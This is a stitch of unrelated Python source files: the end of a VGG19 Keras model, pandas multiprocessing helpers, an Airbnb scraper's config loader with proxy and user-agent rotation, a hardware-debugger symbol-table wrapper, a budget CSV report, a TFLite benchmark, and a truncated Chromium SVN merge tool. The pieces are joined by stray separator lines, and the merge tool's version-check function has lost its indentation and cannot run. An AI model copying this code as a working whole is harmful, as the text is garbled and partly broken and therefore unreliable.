        self.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu'))
        self.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu'))
        self.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu'))
        self.add(MaxPooling2D(pool_size=(2, 2), name="VGG19_Pool3"))
        # Stage 4: 4 x 512 filters.
        self.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
        self.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
        self.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
        self.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
        self.add(MaxPooling2D(pool_size=(2, 2)))
        # Stage 5: 4 x 512 filters (no pooling before the classifier head).
        self.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
        self.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
        self.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
        self.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
        # Classifier head: two 4096-unit FC layers with dropout, 1000-way softmax.
        self.add(Flatten())
        self.add(Dense(4096, activation='relu'))
        self.add(Dropout(0.5))
        self.add(Dense(4096, activation='relu'))
        self.add(Dropout(0.5))
        self.add(Dense(1000, activation='softmax'))
        self.compile(loss='categorical_crossentropy', optimizer='SGD', metrics=['accuracy'])
        self.summary()
|
python
|
import sys
import time
import numpy as np
import pandas as pd
import datetime as dt
import multiprocessing as mp
class MultiProcessingFunctions:
    """Static helper functions that enable multi-processing of pandas jobs.

    Based on the multiprocessing snippets in chapter 20 of Lopez de Prado,
    "Advances in Financial Machine Learning".
    """

    def __init__(self):
        pass

    @staticmethod
    def lin_parts(num_atoms, num_threads):
        """Partition atoms into subsets (molecules) of equal size.

        An atom is an indivisible task. Reference: Snippet 20.6 (page 308).

        :param num_atoms: (int) number of atoms
        :param num_threads: (int) number of processing threads
        :return: (np.ndarray) partition boundaries; first is 0, last num_atoms
        """
        # Partition of atoms with a single loop.
        parts = np.linspace(0, num_atoms, min(num_threads, num_atoms) + 1)
        parts = np.ceil(parts).astype(int)
        return parts

    @staticmethod
    def nested_parts(num_atoms, num_threads, upper_triangle=False):
        """Partition atoms for the parallelization of nested loops.

        Reference: Snippet 20.5 (page 306).

        :param num_atoms: (int) number of atoms
        :param num_threads: (int) number of processing threads
        :param upper_triangle: (bool) when True the first rows are heaviest
        :return: (np.ndarray) partition boundaries; first is 0, last num_atoms
        """
        # Partition of atoms with an inner loop. The running list must be
        # seeded with 0: the previous `parts = []` made `parts[-1]` raise
        # IndexError on the first iteration (the canonical snippet uses [0]).
        parts = [0]
        num_threads_ = min(num_threads, num_atoms)
        for num in range(num_threads_):
            # Solve r^2 + r = prev^2 + prev + atoms*(atoms+1)/threads for
            # the next boundary r via the quadratic formula.
            part = 1 + 4 * (parts[-1] ** 2 + parts[-1] + num_atoms * (num_atoms + 1.) / num_threads_)
            part = (-1 + part ** .5) / 2.
            parts.append(part)
        parts = np.round(parts).astype(int)
        if upper_triangle:  # the first rows are heaviest
            parts = np.cumsum(np.diff(parts)[::-1])
            parts = np.append(np.array([0]), parts)
        return parts

    @staticmethod
    def mp_pandas_obj(func, pd_obj, num_threads=24, mp_batches=1, lin_mols=True, **kargs):
        """Parallelize jobs and return a DataFrame or Series.

        Example: df1 = mp_pandas_obj(func, ('molecule', df0.index), 24, **kwds)
        Reference: Snippet 20.7 (page 310).

        :param func: (callable) function to be parallelized
        :param pd_obj: (tuple) Element 0: name of the argument used to pass
            the molecule; Element 1: list of atoms grouped into molecules
        :param num_threads: (int) number of threads
        :param mp_batches: (int) number of batches
        :param lin_mols: (bool) use linear (True) or nested partitioning
        :param kargs: (var args) extra keyword arguments forwarded to func
        :return: (pd.DataFrame / pd.Series / list) combined results
        """
        if lin_mols:
            parts = MultiProcessingFunctions.lin_parts(len(pd_obj[1]), num_threads * mp_batches)
        else:
            parts = MultiProcessingFunctions.nested_parts(len(pd_obj[1]), num_threads * mp_batches)

        # One job per molecule: slice the atoms and attach the callback.
        jobs = []
        for i in range(1, len(parts)):
            job = {pd_obj[0]: pd_obj[1][parts[i - 1]:parts[i]], 'func': func}
            job.update(kargs)
            jobs.append(job)

        if num_threads == 1:
            out = MultiProcessingFunctions.process_jobs_(jobs)
        else:
            out = MultiProcessingFunctions.process_jobs(jobs, num_threads=num_threads)

        if isinstance(out[0], (pd.DataFrame, pd.Series)):
            # pd.concat replaces the per-item DataFrame.append loop, which
            # is deprecated (removed in pandas 2.0) and quadratic.
            return pd.concat(out).sort_index()
        return out

    @staticmethod
    def process_jobs_(jobs):
        """Run jobs sequentially, for debugging."""
        out = []
        for job in jobs:
            out_ = MultiProcessingFunctions.expand_call(job)
            out.append(out_)
        return out

    @staticmethod
    def expand_call(kargs):
        """Expand the arguments of a callback function, kargs['func']."""
        func = kargs['func']
        del kargs['func']
        out = func(**kargs)
        return out

    @staticmethod
    def report_progress(job_num, num_jobs, time0, task):
        """Report progress to stderr as asynchronous jobs complete."""
        # msg = [fraction done, minutes elapsed, minutes remaining]
        msg = [float(job_num) / num_jobs, (time.time() - time0) / 60.]
        msg.append(msg[1] * (1 / msg[0] - 1))
        time_stamp = str(dt.datetime.fromtimestamp(time.time()))
        msg = time_stamp + ' ' + str(round(msg[0]*100, 2)) + '% '+task+' done after ' + \
            str(round(msg[1], 2)) + ' minutes. Remaining ' + str(round(msg[2], 2)) + ' minutes.'
        if job_num < num_jobs:
            sys.stderr.write(msg+'\r')
        else:
            sys.stderr.write(msg+'\n')
        return

    @staticmethod
    def process_jobs(jobs, task=None, num_threads=24):
        """Run jobs in parallel; each job must contain a 'func' callback."""
        if task is None:
            task = jobs[0]['func'].__name__
        pool = mp.Pool(processes=num_threads)
        outputs = pool.imap_unordered(MultiProcessingFunctions.expand_call, jobs)
        out = []
        time0 = time.time()
        # Process asynchronous output and report progress.
        for i, out_ in enumerate(outputs, 1):
            out.append(out_)
            MultiProcessingFunctions.report_progress(i, len(jobs), time0, task)
        pool.close()
        pool.join()  # this is needed to prevent memory leaks
        return out
|
python
|
#!/usr/bin/python3
# ============================================================================
# Airbnb Configuration module, for use in web scraping and analytics
# ============================================================================
import logging
import os
import configparser
import sys
from bnb_kanpora.models import RoomModel, SurveyModel, SearchAreaModel, SurveyProgressModel
from playhouse.sqlite_ext import SqliteExtDatabase
# All peewee models that share the application's SQLite database connection;
# Config binds, connects and creates tables for these at start-up.
MODELS = [RoomModel, SurveyModel, SearchAreaModel, SurveyProgressModel]
# Module-level logger; handlers/levels are configured by the application entry point.
logger = logging.getLogger()
class Config():
    """Runtime configuration for the scraper.

    Reads an INI-style configuration file (default: app.config), opens the
    SQLite database it describes, binds the peewee MODELS, and exposes all
    network/survey/account tunables as attributes.
    """

    def __init__(self, config_file=None, verbose=False):
        """Read the configuration file <username>.config to set up the run.

        :param config_file: path to the .config file; defaults to app.config
        :param verbose: when True, log at DEBUG level instead of INFO
        """
        self.config_file = config_file
        self.log_level = logging.DEBUG if verbose else logging.INFO
        # Airbnb URL roots used to build room/host/search requests
        self.URL_ROOT = "https://www.airbnb.com/"
        self.URL_ROOM_ROOT = self.URL_ROOT + "rooms/"
        self.URL_HOST_ROOT = self.URL_ROOT + "users/show/"
        self.URL_API_SEARCH_ROOT = self.URL_ROOT + "s/homes"
        self.SEARCH_LISTINGS_ON_FULL_PAGE = 18
        # Defaults; overridden below when present in the config file
        self.HTTP_PROXY_LIST = []
        self.GOOGLE_API_KEY = None
        self.AWS_KEY = None
        self.AWS_SECRET = None
        self.USE_ROTATING_IP = False
        try:
            config = configparser.ConfigParser()
            if self.config_file is None:
                self.config_file = "app.config"
            if not os.path.isfile(self.config_file):
                logging.error("Configuration file %s not found.", self.config_file)
                sys.exit()
            config.read(self.config_file)
            # database
            try:
                self.database = SqliteExtDatabase(f'{config["DATABASE"]["db_name"]}.db', pragmas=(
                    ('cache_size', -1024 * 64),  # 64MB page-cache.
                    ('journal_mode', 'wal'),  # Use WAL-mode (you should always use this!).
                    ('foreign_keys', 1))  # Enforce foreign-key constraints.
                )
                self.database.bind(MODELS)
                self.database.connect()
                self.database.create_tables(MODELS)
            except Exception:
                logger.error("Incomplete database information in %s: cannot continue",
                             self.config_file)
                sys.exit()
            # network
            try:
                self.HTTP_PROXY_LIST = config["NETWORK"]["proxy_list"].split(",")
                self.HTTP_PROXY_LIST = [x.strip() for x in self.HTTP_PROXY_LIST]
                # Remove any empty strings from the list of proxies
                self.HTTP_PROXY_LIST = [x for x in self.HTTP_PROXY_LIST if x]
            except Exception:
                # BUG FIX: was `logger.warningf(...)` on a non-f string, which
                # raised AttributeError and aborted setup whenever proxy_list
                # was absent from the config file.
                logger.warning(f"No proxy_list in {self.config_file}: not using proxies")
                self.HTTP_PROXY_LIST = []
            try:
                self.USER_AGENT_LIST = config["NETWORK"]["user_agent_list"].split(",,")
                self.USER_AGENT_LIST = [x.strip() for x in self.USER_AGENT_LIST]
                self.USER_AGENT_LIST = [x.strip('"') for x in self.USER_AGENT_LIST]
            except Exception:
                # Use the resolved self.config_file (the parameter may be None)
                logger.info(f"No user agent list in {self.config_file}: not using user-agents")
                self.USER_AGENT_LIST = []
            self.MAX_CONNECTION_ATTEMPTS = int(config["NETWORK"]["max_connection_attempts"])
            self.REQUEST_SLEEP = float(config["NETWORK"]["request_sleep"])
            self.HTTP_TIMEOUT = float(config["NETWORK"]["http_timeout"])
            try:
                self.URL_API_SEARCH_ROOT = config["NETWORK"]["url_api_search_root"]
            except Exception:
                logger.warning("Missing config file entry: url_api_search_root.")
                logger.warning("For more information, see example.config")
                self.URL_API_SEARCH_ROOT = self.URL_ROOT + "s/homes"
            try:
                self.API_KEY = config["NETWORK"]["api_key"]
            except Exception:
                logger.warning("Missing config file entry: api_key.")
                logger.warning("For more information, see example.config")
                self.API_KEY = None
            if self.API_KEY is None or self.API_KEY == "":
                # Without an API key, fall back to the plain web search endpoint
                self.URL_API_SEARCH_ROOT = self.URL_ROOT + "s/homes"
            try:
                self.CLIENT_SESSION_ID = config["NETWORK"]["client_session_id"]
            except Exception:
                logger.warning("Missing config file entry: client_session_id.")
                logger.warning("For more information, see example.config")
                self.CLIENT_SESSION_ID = None
            # survey
            self.SEARCH_MAX_PAGES = int(config["SURVEY"]["search_max_pages"])
            self.SEARCH_MAX_GUESTS = int(config["SURVEY"]["search_max_guests"])
            self.RE_INIT_SLEEP_TIME = float(config["SURVEY"]["re_init_sleep_time"])
            # account
            try:
                self.GOOGLE_API_KEY = config["ACCOUNT"]["google_api_key"]
            except Exception:
                logger.warning("Missing config file entry: Google API Key. Needed only for geocoding")
                logger.warning("For more information, see example.config")
            try:
                self.AWS_KEY = config["ACCOUNT"]["aws_key"]
                self.AWS_SECRET = config["ACCOUNT"]["aws_secret"]
            except Exception:
                logger.warning(
                    "Missing config file entry: AWS API Key. Needed only for proxies")
                logger.warning("For more information, see example.config")
        except Exception:
            logger.exception("Failed to read config file properly")
            raise
|
python
|
import _hgdb
class DebugSymbolTableException(Exception):
    """Raised when a symbol-table operation references a missing entity."""

    def __init__(self, what):
        super().__init__(what)
# wrapper class
class DebugSymbolTable:
    """Pythonic wrapper around the native _hgdb debug-database bindings.

    Cross-references between entities (instances, breakpoints, variables)
    are validated before delegating to _hgdb, so mistakes surface as
    DebugSymbolTableException instead of bad database rows.
    """

    def __init__(self, filename):
        self.db = _hgdb.init_debug_db(filename)

    def store_variable(self, id_: int, value: str, is_rtl: bool = True):
        """Store a variable entry."""
        _hgdb.store_variable(self.db, id_, value, is_rtl)

    def store_breakpoint(self, id_: int, instance_id: int, filename: str, line_num: int, column_num: int = 0,
                         condition: str = "", trigger: str = ""):
        """Store a breakpoint; its owning instance must already exist."""
        if not self.has_instance_id(instance_id):
            raise DebugSymbolTableException(f"Instance {instance_id} does not exist!")
        _hgdb.store_breakpoint(self.db, id_, instance_id, filename, line_num, column_num, condition, trigger)

    def store_instance(self, id_: int, full_name: str, annotation: str = ""):
        """Store an instance entry."""
        _hgdb.store_instance(self.db, id_, full_name, annotation)

    def store_scope(self, id_: int, *args: int):
        """Store a scope composed of previously stored breakpoints."""
        for bp in args:
            if not self.has_breakpoint_id(bp):
                raise DebugSymbolTableException(f"Breakpoint {bp} does not exist!")
        _hgdb.store_scope(self.db, id_, *args)

    def store_context_variable(self, name: str, breakpoint_id: int, variable_id: int):
        """Attach an existing variable to an existing breakpoint's context."""
        if not self.has_breakpoint_id(breakpoint_id):
            raise DebugSymbolTableException(f"Breakpoint {breakpoint_id} does not exist!")
        if not self.has_variable_id(variable_id):
            raise DebugSymbolTableException(f"Variable {variable_id} does not exist!")
        _hgdb.store_context_variable(self.db, name, breakpoint_id, variable_id)

    def store_generator_variable(self, name: str, instance_id: int, variable_id: int, annotation: str = ""):
        """Attach an existing variable to an existing generator instance."""
        if not self.has_instance_id(instance_id):
            raise DebugSymbolTableException(f"Instance {instance_id} does not exist!")
        if not self.has_variable_id(variable_id):
            raise DebugSymbolTableException(f"Variable {variable_id} does not exist!")
        _hgdb.store_generator_variable(self.db, name, instance_id, variable_id, annotation)

    # checkers
    def has_instance_id(self, id_):
        return _hgdb.has_instance_id(self.db, id_)

    def has_breakpoint_id(self, id_):
        return _hgdb.has_breakpoint_id(self.db, id_)

    def has_variable_id(self, id_):
        return _hgdb.has_variable_id(self.db, id_)

    # get other information
    def get_filenames(self):
        return _hgdb.get_filenames(self.db)

    # transaction based insertion
    def begin_transaction(self):
        return _hgdb.begin_transaction(self.db)

    def end_transaction(self):
        return _hgdb.end_transaction(self.db)
|
python
|
#This program takes a csv file of financial data as input and produces
#a statistical report stored to a csv file and printed to the terminal.
#The input file must contain a series of months with corresponding profits
#and losses. The output report includes the total number of months analyzed,
#the net total amount of "Profit/Losses" over the entire period, the average
#of the changes in "Profit/Losses" over the entire period, and the greatest
#increase and greatest decrease in profits (date and amount) over the entire
#period.
import csv
import os

month_list = []
month_count = 0
net_profit = 0
greatest_profit = 0
greatest_loss = 0
# Pre-seed the extreme trackers so the report cannot crash with a NameError
# when the data contains no positive (or no negative) entries.
greatest_profit_info = ["N/A", 0]
greatest_loss_info = ["N/A", 0]
# Month-over-month deltas; the header promises the "average of the changes".
previous_profit = None
profit_changes = []

#Store relative path of csv
csvpath = "Resources/budget_data.csv"
#Open csv file, skipping over header row
with open(csvpath) as data_file:
    next(data_file)
    data_rows = csv.reader(data_file, delimiter=',')
    #Loop through csv
    for row in data_rows:
        profit = int(row[1])
        #Count months by accumulating them into a list (omit any duplicates)
        if row[0] not in month_list:
            month_list.append(row[0])
            month_count += 1
        #Accumulate net profit
        net_profit += profit
        #Record the change relative to the previous month (none for the first row)
        if previous_profit is not None:
            profit_changes.append(profit - previous_profit)
        previous_profit = profit
        #As greater profits are found, replace current greatest
        if profit > greatest_profit:
            greatest_profit = profit
            greatest_profit_info = [row[0], row[1]]
        #As greater losses are found, replace current greatest
        elif profit < greatest_loss:
            greatest_loss = profit
            greatest_loss_info = [row[0], row[1]]

#Average of the month-over-month changes (0 when fewer than two months).
#BUG FIX: previously this reported net_profit / month_count (average profit),
#not the average change documented in the header.
average_change = round(sum(profit_changes) / len(profit_changes), 2) if profit_changes else 0

#Organize results into formatted report
report = f"Total months: {month_count}"\
    f"\nNet profit: {net_profit}"\
    f"\nAverage change: {average_change}"\
    f"\nGreatest increase in profit: {greatest_profit_info[1]} on {greatest_profit_info[0]}"\
    f"\nGreatest decrease in profit: {greatest_loss_info[1]} on {greatest_loss_info[0]}"

#Print report to terminal and a new csv file. Write through a joined path
#(creating the directory if needed) instead of os.chdir, so later relative
#paths keep working and a missing Analysis/ directory is not fatal.
print(report)
output_directory = "Analysis"
os.makedirs(output_directory, exist_ok=True)
with open(os.path.join(output_directory, 'banking_results.csv'), 'w', newline='') as output_file:
    output_file.write(report)
|
python
|
import numpy as np
import tensorflow as tf
import time

# Load TFLite model and allocate tensors.
interpreter = tf.lite.Interpreter(model_path="output/model.tflite")
interpreter.allocate_tensors()

# Get input and output tensors.
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()

# Measure model FPS on random input data.
input_shape = input_details[0]['shape']
input_data = np.array(np.random.random_sample(input_shape), dtype=np.float32)

NUM_RUNS = 10
start = time.time()
for _ in range(NUM_RUNS):
    interpreter.set_tensor(input_details[0]['index'], input_data)
    interpreter.invoke()
    # `get_tensor()` returns a copy of the tensor data; use `tensor()` for a
    # pointer instead. Fetch the output so the run is complete end-to-end, but
    # do NOT print inside the timed loop — terminal I/O would skew the timing.
    output_data = interpreter.get_tensor(output_details[0]['index'])
end = time.time()

elapsed = end - start
print(output_data.shape)
print(elapsed)
print(f"FPS: {NUM_RUNS / elapsed:.2f}")
|
python
|
#!/usr/bin/env python2
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import datetime
import optparse
import os
import re
import sys
import urlparse
import gclient_utils
import subprocess2
# Usage text shown by optparse; %(app)s is substituted with sys.argv[0].
USAGE = """
WARNING: Please use this tool in an empty directory
(or at least one that you don't mind clobbering.)
REQUIRES: SVN 1.5+
NOTE: NO NEED TO CHECKOUT ANYTHING IN ADVANCE OF USING THIS TOOL.
Valid parameters:
[Merge from trunk to branch]
--merge <revision> --branch <branch_num>
Example: %(app)s --merge 12345 --branch 187
[Merge from trunk to local copy]
--merge <revision> --local
Example: %(app)s --merge 12345 --local
[Merge from branch to branch]
--merge <revision> --sbranch <branch_num> --branch <branch_num>
Example: %(app)s --merge 12345 --sbranch 248 --branch 249
[Revert from trunk]
--revert <revision>
Example: %(app)s --revert 12345
[Revert from branch]
--revert <revision> --branch <branch_num>
Example: %(app)s --revert 12345 --branch 187
"""
# Module-level caches, populated lazily by getFileInfo()/getBest*PathsMap2().
export_map_ = None
files_info_ = None
delete_map_ = None
# Matches "  <status>  /<trunk-or-branch>/src<dir>/<file>" lines from `svn log -v`.
file_pattern_ = r"[ ]+([MADUC])[ ]+/((?:trunk|branches/.*?)/src(.*)/(.*))"
# Directory containing this script; used to find the sibling `gcl` tool.
depot_tools_dir_ = os.path.dirname(os.path.abspath(__file__))
def runGcl(subcommand):
  """Run `gcl <subcommand>` via os.system and return its exit status.

  Prefers the copy of gcl that sits next to this script, falling back to
  the one on PATH.
  """
  gcl_path = os.path.join(depot_tools_dir_, "gcl")
  if not os.path.exists(gcl_path):
    print "WARNING: gcl not found beside drover.py. Using system gcl instead..."
    gcl_path = 'gcl'
  command = "%s %s" % (gcl_path, subcommand)
  return os.system(command)
def gclUpload(revision, author):
  """Run `gcl upload` for *revision*, mailing the review to *author*."""
  subcommand = ("upload %s --send_mail --no_presubmit --reviewers=%s"
                % (revision, author))
  return runGcl(subcommand)
def getSVNInfo(url, revision):
  """Return `svn info` output for url@revision as a {field: value} dict."""
  result = {}
  output = subprocess2.capture(
      ['svn', 'info', '--non-interactive', '%s@%s' % (url, revision)],
      stderr=subprocess2.VOID).splitlines()
  for entry in output:
    parsed = re.search(r"(.*?):(.*)", entry)
    if parsed:
      result[parsed.group(1).strip()] = parsed.group(2).strip()
  return result
def isSVNDirty():
  """Return True when `svn status` reports anything besides X/? entries."""
  for line in subprocess2.check_output(['svn', 'status']).splitlines():
    if re.search(r"^[^X?]", line):
      return True
  return False
def getAuthor(url, revision):
  """Return the last-changed author of url@revision, or None if unknown."""
  return getSVNInfo(url, revision).get("Last Changed Author")
def isSVNFile(url, revision):
  """Return True when url@revision names an svn file node."""
  return getSVNInfo(url, revision).get("Node Kind") == "file"
def isSVNDirectory(url, revision):
  """Return True when url@revision names an svn directory node."""
  return getSVNInfo(url, revision).get("Node Kind") == "directory"
def inCheckoutRoot(path):
  """Return True when *path* is the top directory of an svn working copy.

  A path is the root when it has a repository root and its parent directory
  reports a different (or no) repository root.
  """
  info = getSVNInfo(path, "HEAD")
  if "Repository Root" not in info:
    return False
  repo_root = info["Repository Root"]
  parent_info = getSVNInfo(os.path.dirname(os.path.abspath(path)), "HEAD")
  return parent_info.get("Repository Root", None) != repo_root
def getRevisionLog(url, revision):
  """Return the svn log message for *revision* of *url*, stripped of the
  header lines and the trailing "---..." separator."""
  log_lines = subprocess2.check_output(
      ['svn', 'log', url, '-r', str(revision)],
      universal_newlines=True).splitlines(True)
  return ''.join(log_lines[3:-1])
def getSVNVersionInfo():
  """Extract version information from `svn --version`.

  Returns a dict with 'version', 'major', 'minor' and 'patch' keys, or None
  when no version line can be parsed.
  """
  for line in subprocess2.check_output(['svn', '--version']).splitlines():
    match = re.search(r"svn, version ((\d+)\.(\d+)\.(\d+))", line)
    if match:
      return {
          'version': match.group(1),
          'major': int(match.group(2)),
          'minor': int(match.group(3)),
          'patch': int(match.group(4)),
      }
  return None
def isMinimumSVNVersion(major, minor, patch=0):
  """Return True when the installed SVN is at least major.minor.patch."""
  return _isMinimumSVNVersion(getSVNVersionInfo(), major, minor, patch)
def _isMinimumSVNVersion(version, major, minor, patch=0):
"""Test for minimum SVN version, internal method"""
if not version:
return False
if (version['major'] > major):
return True
elif (version['major'] < major):
return False
if (version['minor'] > minor):
return True
elif (version['minor'] < minor):
return False
if (version['patch'] >= patch):
return True
else:
return False
def checkoutRevision(url, revision, branch_url, revert=False, pop=True):
  """Build a sparse checkout of branch_url holding only the paths touched
  by *revision* of *url*.

  Checks out the branch root non-recursively, `svn update --depth empty`s
  each parent directory, then `svn up`s every file of the revision (all
  files for a revert, only pre-existing files otherwise).

  :param pop: drop the leading path component ('trunk' or 'branches/N')
              before mapping repository paths into the checkout.
  """
  files_info = getFileInfo(url, revision)
  paths = getBestMergePaths2(files_info, revision)
  export_map = getBestExportPathsMap2(files_info, revision)
  command = 'svn checkout -N ' + branch_url
  print command
  os.system(command)
  # cd into the directory svn just created (last URL component).
  match = re.search(r"^[a-z]+://.*/(.*)", branch_url)
  if match:
    os.chdir(match.group(1))
  # This line is extremely important due to the way svn behaves in the
  # set-depths action. If parents aren't handled before children, the child
  # directories get clobbered and the merge step fails.
  paths.sort()
  # Checkout the directories that already exist
  for path in paths:
    if (export_map.has_key(path) and not revert):
      print "Exclude new directory " + path
      continue
    subpaths = path.split('/')
    #In the normal case, where no url override is specified and it's just
    # chromium source, it's necessary to remove the 'trunk' from the filepath,
    # since in the checkout we include 'trunk' or 'branch/\d+'.
    #
    # However, when a url is specified we want to preserve that because it's
    # a part of the filepath and necessary for path operations on svn (because
    # frankly, we are checking out the correct top level, and not hacking it).
    if pop:
      subpaths.pop(0)
    base = ''
    for subpath in subpaths:
      base += '/' + subpath
      # This logic ensures that you don't empty out any directories
      if not os.path.exists("." + base):
        command = ('svn update --depth empty ' + "." + base)
        print command
        os.system(command)
  if (revert):
    files = getAllFilesInRevision(files_info)
  else:
    files = getExistingFilesInRevision(files_info)
  for f in files:
    # Prevent the tool from clobbering the src directory
    if (f == ""):
      continue
    command = ('svn up ".' + f + '"')
    print command
    os.system(command)
def mergeRevision(url, revision):
  """Merge the (revision-1 -> revision) delta of each touched path from
  *url* into the working copy.

  Paths that are new in this revision are skipped here; they are handled
  by exportRevision() instead.
  """
  paths = getBestMergePaths(url, revision)
  export_map = getBestExportPathsMap(url, revision)
  for path in paths:
    if export_map.has_key(path):
      continue
    # -N: non-recursive; ancestry/eol-style flags keep noise out of the merge.
    command = ('svn merge -N -r ' + str(revision-1) + ":" + str(revision) + " ")
    command += " --ignore-ancestry "
    command += " -x --ignore-eol-style "
    command += url + path + "@" + str(revision) + " ." + path
    print command
    os.system(command)
def exportRevision(url, revision):
  """Export (copy without svn metadata) each directory added in *revision*
  and `svn add` it to the working copy, parents before children."""
  paths = getBestExportPathsMap(url, revision).keys()
  paths.sort()
  for path in paths:
    command = ('svn export -N ' + url + path + "@" + str(revision) + " ." +
               path)
    print command
    os.system(command)
    command = 'svn add .' + path
    print command
    os.system(command)
def deleteRevision(url, revision):
  """`svn delete` each directory removed by *revision*, deepest paths first
  (reverse-sorted) so children are deleted before their parents."""
  paths = getBestDeletePathsMap(url, revision).keys()
  paths.sort()
  paths.reverse()
  for path in paths:
    command = "svn delete ." + path
    print command
    os.system(command)
def revertExportRevision(url, revision):
  """Undo exportRevision(): `svn delete` every directory that *revision*
  added, deepest paths first."""
  paths = getBestExportPathsMap(url, revision).keys()
  paths.sort()
  paths.reverse()
  for path in paths:
    command = "svn delete ." + path
    print command
    os.system(command)
def revertRevision(url, revision):
  """Reverse-merge *revision* of *url* into the working copy (`svn merge -c -REV`)."""
  command = ('svn merge --ignore-ancestry -c -%d %s .' % (revision, url))
  print command
  os.system(command)
def getFileInfo(url, revision):
  """Parse `svn log -v` for *revision* into [status, full_path, dir, file]
  entries matching file_pattern_.

  The result is memoized in the module-level files_info_, so only the first
  call hits the network.
  """
  global files_info_
  if (files_info_ != None):
    return files_info_
  svn_log = subprocess2.check_output(
      ['svn', 'log', url, '-r', str(revision), '-v']).splitlines()
  info = []
  for line in svn_log:
    # A workaround to dump the (from .*) stuff, regex not so friendly in the 2nd
    # pass...
    match = re.search(r"(.*) \(from.*\)", line)
    if match:
      line = match.group(1)
    match = re.search(file_pattern_, line)
    if match:
      info.append([match.group(1).strip(), match.group(2).strip(),
                   match.group(3).strip(),match.group(4).strip()])
  files_info_ = info
  return info
def getBestMergePaths(url, revision):
  """Return the unique directory paths touched by *revision* of *url*."""
  return getBestMergePaths2(getFileInfo(url, revision), revision)
def getBestMergePaths2(files_info, revision):
  """Return the unique directory components (index 2) from *files_info*."""
  return list({entry[2] for entry in files_info})
def getBestExportPathsMap(url, revision):
  """Return the (cached) map of directories newly added by *revision*."""
  return getBestExportPathsMap2(getFileInfo(url, revision), revision)
def getBestExportPathsMap2(files_info, revision):
  """Return {dir/file: ""} for every entry Added ('A') in this revision that
  is an svn directory (checked via isSVNDirectory, i.e. a network call per
  candidate). Memoized in the module-level export_map_."""
  global export_map_
  if export_map_:
    return export_map_
  result = {}
  for file_info in files_info:
    if (file_info[0] == "A"):
      if(isSVNDirectory("svn://svn.chromium.org/chrome/" + file_info[1],
                        revision)):
        result[file_info[2] + "/" + file_info[3]] = ""
  export_map_ = result
  return result
def getBestDeletePathsMap(url, revision):
  """Return the (cached) map of directories deleted by *revision*."""
  return getBestDeletePathsMap2(getFileInfo(url, revision), revision)
def getBestDeletePathsMap2(files_info, revision):
  """Return {dir/file: ""} for every entry Deleted ('D') in this revision
  that is an svn directory (checked via isSVNDirectory, a network call per
  candidate). Memoized in the module-level delete_map_."""
  global delete_map_
  if delete_map_:
    return delete_map_
  result = {}
  for file_info in files_info:
    if (file_info[0] == "D"):
      if(isSVNDirectory("svn://svn.chromium.org/chrome/" + file_info[1],
                        revision)):
        result[file_info[2] + "/" + file_info[3]] = ""
  delete_map_ = result
  return result
def getExistingFilesInRevision(files_info):
  """Return 'dir/file' paths for entries that already existed before the
  revision (everything whose status is not 'A'; Added entries need a merge
  or an export + add instead)."""
  paths = []
  for entry in files_info:
    if entry[0] != 'A':
      paths.append('%s/%s' % (entry[2], entry[3]))
  return paths
def getAllFilesInRevision(files_info):
  """Return 'dir/file' paths for every entry in *files_info*, regardless of
  status."""
  return ['/'.join((entry[2], entry[3])) for entry in files_info]
def getSVNAuthInfo(folder=None):
  """Read cached SVN credentials from the subversion auth folder.

  Returns a dict keyed by auth-file name; each value is the key/value
  dictionary parsed from that file. Any error yields whatever was parsed so
  far (possibly {}).
  """
  if not folder:
    folder = ('%%APPDATA%\\Subversion\\auth' if sys.platform == 'win32'
              else '~/.subversion/auth')
  folder = os.path.expandvars(os.path.expanduser(folder))
  simple_dir = os.path.join(folder, 'svn.simple')
  creds = {}
  try:
    for auth_file in os.listdir(simple_dir):
      # Each file is a sequence of "K <len>\n<key>\nV <len>\n<value>\n" records.
      contents = open(os.path.join(simple_dir, auth_file)).read()
      creds[auth_file] = dict(
          re.findall(r'K [0-9]+\n(.*)\nV [0-9]+\n(.*)\n', contents))
  except Exception:
    pass
  return creds
def getCurrentSVNUsers(url):
  """Guess the current SVN usernames by scanning the cached auth folder for
  realms matching *url*'s host.

  google.com usernames also get their chromium.org alias appended.
  """
  netloc = urlparse.urlparse(url)[1]
  auth_infos = getSVNAuthInfo()
  results = []
  for _, auth_info in auth_infos.iteritems():
    if ('svn:realmstring' in auth_info
        and netloc in auth_info['svn:realmstring']):
      username = auth_info['username']
      results.append(username)
      if 'google.com' in username:
        results.append(username.replace('google.com', 'chromium.org'))
  return results
def prompt(question):
  """Ask a yes/no question on stdin, looping until the answer starts with
  'y' (returns True) or 'n' (returns False)."""
  while True:
    print question + " [y|n]:",
    answer = sys.stdin.readline()
    if answer.lower().startswith('n'):
      return False
    elif answer.lower().startswith('y'):
      return True
def text_prompt(question, default):
  """Ask for one line of input; blank input returns *default*.

  NOTE(review): a non-empty answer is returned with its trailing newline
  intact (readline() is not stripped) — callers appear to tolerate this.
  """
  print question + " [" + default + "]:"
  answer = sys.stdin.readline()
  if answer.strip() == "":
    return default
  return answer
def drover(options, args):
  """Execute a merge or revert described by *options*.

  Builds a sparse working copy, performs the svn merge/revert, writes the
  change description to <revision>.txt and drives `gcl` to upload (and
  optionally commit) the change. Returns a process exit status (0 on
  success).
  """
  revision = options.revert or options.merge
  # Initialize some variables used below. They can be overwritten by
  # the drover.properties file.
  BASE_URL = "svn://svn.chromium.org/chrome"
  REVERT_ALT_URLS = ['svn://svn.chromium.org/blink',
                     'svn://svn.chromium.org/chrome-internal',
                     'svn://svn.chromium.org/native_client']
  TRUNK_URL = BASE_URL + "/trunk/src"
  BRANCH_URL = BASE_URL + "/branches/$branch/src"
  SKIP_CHECK_WORKING = True
  PROMPT_FOR_AUTHOR = False
